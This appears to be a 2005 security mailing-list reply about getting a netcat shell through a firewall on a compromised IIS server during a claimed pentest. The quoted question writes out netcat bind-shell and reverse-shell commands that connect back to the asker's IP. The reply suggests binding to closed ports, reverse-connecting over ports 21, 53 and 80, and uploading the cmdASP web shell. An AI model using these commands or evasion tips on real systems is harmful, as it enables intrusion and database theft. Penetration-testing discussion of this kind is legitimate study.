Re: Netcat Question

From: Mariano Nuñez Di Croce (mnunez@cybsec.com)
Date: Wed Jun 01 2005 - 10:40:30 EDT


You probably have a firewall in front of the target webserver.
I would recommend that you follow these steps:
    1. Do a TCP full scan to see if you can get one port in "closed"
state. Then try to bind netcat to that port and connect remotely.
    2. If the firewall is stateful, I think you won't be able to reverse
connect to your public IP, because it will filter the outgoing SYN
packet. Anyway, you should try to connect to your public IP on common
ports, like 21, 53 and 80. Maybe those aren't filtered.

   By the way, if you want a shell-like prompt, you can upload cmdASP,
which provides shell interaction through an ASP page.

    Hope this helps,
  

------------------------------
Mariano Nuñez Di Croce

CYBSEC S.A. Security Systems
Email: mnunez@cybsec.com
Tel/Fax: (54-11) 4382-1600
Web: http://www.cybsec.com
------------------------------

intel96 wrote:

> To All,
>
> I am conducting a pentest and I have been able to upload netcat to the
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received a
> timeout on my side. I have also tried this with port 53 and it also
> did not work.
>
> I then tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe
>
> This did not work either. I did not see the remote system trying to
> connect to my system via my logs. I have access to upload anything to
> the system and run most commands via sql injections. I have
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or are there any other
> commands that may provide me more access or allow me to dump the
> database?
>
> Thanks,
>
> Intel96